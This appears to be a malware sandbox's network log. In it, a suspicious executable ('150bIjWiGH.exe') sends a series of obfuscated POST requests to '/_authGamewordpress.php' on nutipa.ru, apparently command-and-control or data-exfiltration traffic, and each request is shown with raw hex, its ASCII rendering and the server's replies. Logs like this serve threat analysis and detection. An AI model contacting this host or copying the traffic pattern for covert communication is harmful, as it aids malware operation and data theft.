                                                            Dec 15, 2024 19:37:56.729398012 CET798INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:56 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W44l74UXtM5jgXNQMxMY%2BXOyUhP5O%2B2OCGGSNsNYbvXa63B8W5UXgc69ChIsGCSFeJ7Epd7Nb%2FKQmVWOanj9lj0dyvYg6BQ9A%2BaBNC2rprB7CgyfoWB7UQGn%2BoI%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c3b2a8c43a4-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=6498&min_rtt=3910&rtt_var=6643&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=59303&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            72192.168.2.449837104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:56.776158094 CET320OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1420
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:37:57.123029947 CET1420OUTData Raw: 50 51 43 5b 5f 5a 58 57 5d 5a 56 51 50 50 57 56 55 50 5e 41 5a 57 5b 5a 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PQC[_ZXW]ZVQPPWVUP^AZW[Z\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'?1>7!?:@)>(#'1>*^&==Q)'$>6]?)/+.F'#P
                                                            Dec 15, 2024 19:37:57.863766909 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:58.128935099 CET946INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:57 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hVPvTYBz9QELzWgH0VBEKWQmULF1IAUwbQncZJ6GgYKF%2F1xeYP3tYVVKYeh1nZQLUUF7ADwwndoKFcvp5%2B6%2FlWvnq5d4pNij04YtTeTGUeIvOBAszqFbB%2BFp43Q%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c43bd997292-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3291&min_rtt=1901&rtt_var=3494&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=1740&delivery_rate=112092&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 39 38 0d 0a 06 1f 3a 01 21 3a 26 54 23 3e 3f 0c 39 3c 0f 57 3f 1e 2c 08 33 22 29 5b 24 28 27 16 2a 3d 30 0a 26 29 2a 06 23 22 25 1c 3f 09 21 12 25 36 21 51 03 11 22 58 25 07 30 59 3d 39 34 16 26 31 01 14 31 3d 01 05 28 5e 3a 1d 24 01 23 1f 37 2e 3c 52 39 39 23 02 2b 04 37 16 2d 07 3a 1e 37 1c 2e 53 0c 17 26 01 3f 3a 3a 13 21 32 17 56 30 2c 34 0d 34 39 32 1d 3d 30 3c 51 33 33 23 57 30 58 3b 0e 20 30 2d 1a 25 03 22 5e 37 32 3d 08 2a 22 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 98:!:&T#>?9<W?,3")[$('*=0&)*#"%?!%6!Q"X%0Y=94&11=(^:$#7.<R99#+7-:7.S&?::!2V0,4492=0<Q33#W0X; 0-%"^72=*"%\ .R4]T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            73192.168.2.449838104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:56.900105953 CET320OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:37:57.250092983 CET2536OUTData Raw: 50 55 43 50 5f 58 58 5e 5d 5a 56 51 50 5d 57 53 55 51 5e 46 5a 5f 5b 5c 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PUCP_XX^]ZVQP]WSUQ^FZ_[\\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$\?[2)\+X!=(3 /4\1*%X9Q*Z0>%<#=,.F'#P 3
                                                            Dec 15, 2024 19:37:57.987832069 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:58.224349022 CET790INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:58 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QgRgcPx9XYFAwL69gCyvQwwEQr0Vyh1dXizLyrR0yAaRqn5kVFFi6YMG0t7oppVosq7MFS6WJ4%2BUocu67ViToiCJU4IovpDuLJPz9DchjPAVC72OFicWBIPxIDk%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c447d7842c3-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3606&min_rtt=1862&rtt_var=4187&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=92294&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            74192.168.2.449839104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:58.582103968 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:58.935688972 CET2536OUTData Raw: 55 55 43 5b 5a 5b 58 5f 5d 5a 56 51 50 5b 57 55 55 55 5e 41 5a 57 5b 53 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UUC[Z[X_]ZVQP[WUUU^AZW[S\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$(-&_=: 5)(+#;1:1=0'[$6Y( >8;.F'#P +
                                                            Dec 15, 2024 19:37:59.659472942 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:59.892218113 CET803INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:59 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sh7Zl%2Bd4jEnEh8rA4yTgGXLbN0TsF%2B7H1XLISH0%2B46ZeQXDSbOFPsfELStlMuxlwjTG%2BCP%2BiQTNPO2la8l581K6Ffw0OB%2BSUffPM9a9lL%2FUJsy3UT9ZoEUzBt2M%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c4eea3078e8-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3884&min_rtt=2359&rtt_var=3935&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=100260&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            75192.168.2.449840104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:38:00.131548882 CET320OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:38:00.482367992 CET2536OUTData Raw: 50 52 43 50 5f 57 58 5e 5d 5a 56 51 50 5a 57 54 55 50 5e 40 5a 50 5b 5c 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PRCP_WX^]ZVQPZWTUP^@ZP[\\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'+-=/5Z6@( ?7&.=2-='Z'."=0"-;.F'#P /
                                                            Dec 15, 2024 19:38:01.226608992 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:38:01.481857061 CET793INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:38:01 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rea1M8i3PWdWXhBMjr31aQnqC4W8ZFikARtlzoB2La3qb4s7tiQhHSJwJWkaOB09MF3QeG%2BQ%2FY1ufxWDhFuLHN2yiyVLxFFiWgAixjb3lUWtSOFCwmrek413KuQ%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c58bc0942ea-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=8516&min_rtt=1665&rtt_var=14327&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=25852&cwnd=142&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            76192.168.2.449841104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:38:01.766807079 CET320OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:38:02.123197079 CET2536OUTData Raw: 55 52 43 5f 5f 57 5d 55 5d 5a 56 51 50 5a 57 51 55 5d 5e 41 5a 55 5b 5e 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: URC__W]U]ZVQPZWQU]^AZU[^\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$+*X>\;[5*C+$7?<\1X"X%>-)/3>*_?9S,.F'#P /
                                                            Dec 15, 2024 19:38:02.852874994 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:38:03.090897083 CET796INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:38:02 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ky%2FDU%2Fx9mxV6RnbzxBxo1E8xNl6mqV1rIRD3eXQoiG5pZ2VewdPYHgOwo8KtbM%2FanrWlDpfh99Te8qm4MakSIUuTtZlJ6JbW0jQ9aykhHOUY5fd1rY3e9%2Bv1RbM%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c62db0d439a-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4871&min_rtt=1808&rtt_var=6805&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=55477&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            77192.168.2.449843104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:38:03.340619087 CET320OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:38:03.685527086 CET2536OUTData Raw: 50 57 43 50 5f 5f 58 53 5d 5a 56 51 50 50 57 5b 55 57 5e 49 5a 50 5b 58 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PWCP__XS]ZVQPPW[UW^IZP[X\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$Z<=-)/!Z>?$7?Y1X>]&9*U$%.&X+>-+.F'#P
                                                            Dec 15, 2024 19:38:04.429358959 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:38:04.698626995 CET796INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:38:04 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nu%2Ba4CLbBUicKJh339zuWeKB%2FMAiM3nGxdDn9FtLlO%2FaE%2B90yGX1Wtky2qWdoD85zsbSt3VVzKr8P1ciWKNnOUHbWvBVYKOjJXT73mR7mhDILBbgxJ737gCY22o%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c6cbea242d0-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=5063&min_rtt=1763&rtt_var=7263&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=51828&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            78192.168.2.449844104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:38:05.036149979 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:38:05.388701916 CET2536OUTData Raw: 50 51 46 5a 5f 5d 58 5f 5d 5a 56 51 50 5f 57 50 55 54 5e 48 5a 5f 5b 5a 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PQFZ_]X_]ZVQP_WPUT^HZ_[Z\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$]<>&=#X"?*A([47&X1'=1U)30>6< "8+.F'#P
                                                            Dec 15, 2024 19:38:06.123265982 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:38:06.374641895 CET794INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:38:06 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NdwJtBtdQdvMYZTscohfMVQ55ven215l%2FREG3XtxFbAE98uaaixCZ8bOw3oGw6KKZxIKnAX9KNBZgBtvrOXBwBQaIm%2FUbes3lTKjPnLlaSSR1YR9SyMEDX%2BtkeU%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c775b5bc46d-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3851&min_rtt=1590&rtt_var=5119&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=74183&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            79192.168.2.449845104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:38:06.615848064 CET320OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:38:06.966782093 CET2536OUTData Raw: 50 56 43 5b 5a 5c 58 53 5d 5a 56 51 50 50 57 51 55 51 5e 45 5a 51 5b 59 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PVC[Z\XS]ZVQPPWQUQ^EZQ[Y\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$+.=975(( ?8%1P=#;[$>*X+1W,;.F'#P
                                                            Dec 15, 2024 19:38:07.703382969 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:38:07.965614080 CET794INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:38:07 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mXSd0dBaorpllO8hb68qEZn9hPXeIBh%2BRK6HLnuLvkng6UgjuLNiKbXx01hXPgS1%2FRZXiw5t8Zda42nTukAfsKKWsL3f9xkhf1Qd11U48tO58g48Iq3F%2FVweKS4%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c813d808c18-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3977&min_rtt=2053&rtt_var=4618&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=83691&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            80192.168.2.449846104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:38:08.210261106 CET320OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            81192.168.2.449847104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:38:08.338500023 CET320OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1420
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:38:08.690563917 CET1420OUTData Raw: 55 53 43 51 5f 5e 5d 55 5d 5a 56 51 50 51 57 54 55 50 5e 48 5a 54 5b 58 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: USCQ_^]U]ZVQPQWTUP^HZT[X\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$Z?>*45?>E)=$!/\1"2.=#+X3>=3&,.F'#P
                                                            Dec 15, 2024 19:38:09.426402092 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:38:09.660123110 CET946INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:38:09 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gAfELm%2FZYNZTUVi7Ryg0Kkf4sKulI%2BmmlqOVnW0MHohdxXOs9Wfk5802X5CLSg8%2Ftnb1cZyTF4rQ3AEgRT1C92mA1Htg6GK8SJU8eaw69tZjrxyVoFr%2Fpm7GZNE%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c8bf9e90f74-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3546&min_rtt=2137&rtt_var=3620&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1740&delivery_rate=108865&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
